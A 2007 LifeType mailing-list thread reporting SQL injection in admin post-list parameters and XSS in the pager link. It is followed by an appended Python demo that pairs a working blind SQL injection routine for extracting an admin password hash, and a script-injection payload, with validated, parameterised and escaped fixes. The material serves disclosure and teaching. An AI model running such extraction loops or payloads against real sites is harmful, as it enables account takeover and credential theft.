[pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts List interfaces & an XSS vuln

Mark Wu markplace at gmail.com
Tue Jul 17 00:59:30 EDT 2007


mmmm ... For this issue.
 
Then, I think we should add a validator to each parameter ... :(
 
Mark

  _____  

From: plog-svn-bounces at devel.lifetype.net
[mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of Matt Wood
Sent: Tuesday, July 17, 2007 10:31 AM
To: plog-svn at devel.lifetype.net
Subject: [pLog-svn] [Lifetype] Multiple SQL Injections in Admin Posts
List interfaces & an XSS vuln


I was playing with the new ajax "build" earlier today and the new pretty YUI
components and found a couple of problems, some unrelated and some related to
the ajax stuff [in which I noticed that most inputs were verified by oscar :),
from those plog-svn change-sets].

I've verified these attacks work, but truthfully the only important cases
exist when you allow public registration for a blog through the lifetype
core (or have an untrusted user base), since in order to exploit these
vulnerabilities you must have a valid session.

There are many parameters passed into AdminPostsListView from
AdminEditPostsAction.class.php which are not validated and lead to SQL
injection attacks (recovering the admin's md5 password hash for example).

In the performAjax() and perform() methods:
---
lifetype-1.3-ajax/class/action/admin/admineditpostsaction.class.php:

                  "showMonth" => $this->_request->getValue( "showMonth" ),
---
which is passed into the following, again unverified...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $this->_showMonth = $this->_getParameter( $params, "showMonth",
            $this->_locale->formatDate( new Timestamp(), "%Y%m" ));
---
This leads to SQL injection on almost all of the variables here... You can
easily verify this by checking the MySQL logs and by looking at the query
string before it is sent to the database. Since this injection is in the WHERE
clause, many bad things can occur. The most pervasive of these are blind SQL
attacks on the password hashes.


These parameters are also echoed onto the web page unfiltered...
---
lifetype-1.3-ajax/class/view/admin/adminpostslistview.class.php:

        $pager = new Pager(
            "?op=editPosts&showMonth={$this->_showMonth}&amp;showStatus={$this->_showStatus}&showCategory={$this->_showCategory}&amp;showUser={$this->_showUser}&searchTerms={$this->_searchTerms}&showLocation={$this->_locationId}&page="
---
leading to XSS with some clever parameters (which requires the pager to
actually display links).


On the severity...
The XSS vuln is not really that important... but even with a semi-trusted
user base the SQL injections could lead to the admin having his password
discovered.


-Matt
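As an added illustration, and not code from this thread or from LifeType itself, the Python model below reproduces the two patterns Matt describes: a request value (showMonth) interpolated straight into a WHERE clause, driven by a boolean-based blind extraction of the admin's hash, and the same request values dropped unescaped into the pager href. Each sits beside a hardened form: the allowlist validator Mark proposes, a bound query parameter, and URL/HTML escaping for the link. LifeType is PHP on MySQL; the sqlite backing store, the table and column names, the md5 value and every function name here are assumptions made for the demo.

```python
import html
import re
import sqlite3
from urllib.parse import urlencode

# Constructed stand-in for the tables the admin posts list touches. Table and
# column names are assumptions for this demo, not LifeType's real schema; the
# hash is md5("password") so the extraction result is easy to recognise.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, password TEXT);
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, date TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO articles VALUES (1, 'Hello', '200707'), (2, 'Old', '200612');
    """)
    return conn

# --- the vulnerable pattern: request value interpolated into the WHERE clause ---

def vulnerable_sql(show_month):
    # What reaches the database; logging this (or reading the MySQL query log)
    # is the check the report suggests for confirming an injection.
    return f"SELECT id, title FROM articles WHERE date = '{show_month}'"

def list_posts_vulnerable(conn, show_month):
    return conn.execute(vulnerable_sql(show_month)).fetchall()

def blind_extract_hash(conn, length=8):
    # Boolean-based blind injection: the listing shows posts when the guessed
    # hash character is right and nothing when it is wrong. The closing quote
    # comes from the template, so the payload ends with an open '.
    recovered = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            payload = (f"200707' AND (SELECT substr(password,{pos},1) "
                       f"FROM users WHERE user='admin') = '{c}")
            if list_posts_vulnerable(conn, payload):
                recovered += c
                break
    return recovered

# --- the hardened form: allowlist validator plus a bound parameter ---

MONTH_RE = re.compile(r"\d{6}")  # the %Y%m shape the view's default produces

def validate_month(value):
    # Returns the value only if it is exactly six digits, else None. The caller
    # may then reject the request or fall back to the view's default; either
    # way the raw request value never reaches the query text.
    return value if isinstance(value, str) and MONTH_RE.fullmatch(value) else None

def list_posts_hardened(conn, show_month):
    month = validate_month(show_month)
    if month is None:
        return []
    # Bound parameter: even a value that slips past a weak validator cannot
    # change the query's structure. This is the fix that also covers free-text
    # inputs such as searchTerms, where no allowlist regex applies.
    return conn.execute(
        "SELECT id, title FROM articles WHERE date = ?", (month,)).fetchall()

# --- the pager link: the same request values echoed into an href ---

def pager_url_vulnerable(params):
    # Same shape as the Pager string in the report: values dropped in unescaped.
    return ("?op=editPosts&showMonth={showMonth}&showStatus={showStatus}"
            "&searchTerms={searchTerms}&page=").format(**params)

def pager_url_hardened(params):
    # urlencode percent-encodes every value (so " < > cannot survive), and
    # html.escape makes the whole string safe inside an attribute.
    return html.escape("?" + urlencode({"op": "editPosts", **params}) + "&page=")

if __name__ == "__main__":
    db = make_db()
    print(blind_extract_hash(db))   # first 8 hex chars of the admin hash
    xss = {"showMonth": "200707", "showStatus": "1",
           "searchTerms": '"><script>alert(1)</script>'}
    print(pager_url_vulnerable(xss))
    print(pager_url_hardened(xss))
```

The regex allowlist is the right tool for showMonth, showStatus and the other id-like parameters, but it cannot be applied to searchTerms, so the general fix is to stop building the WHERE clause from request strings at all and bind every value; the validator then only adds defence in depth.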
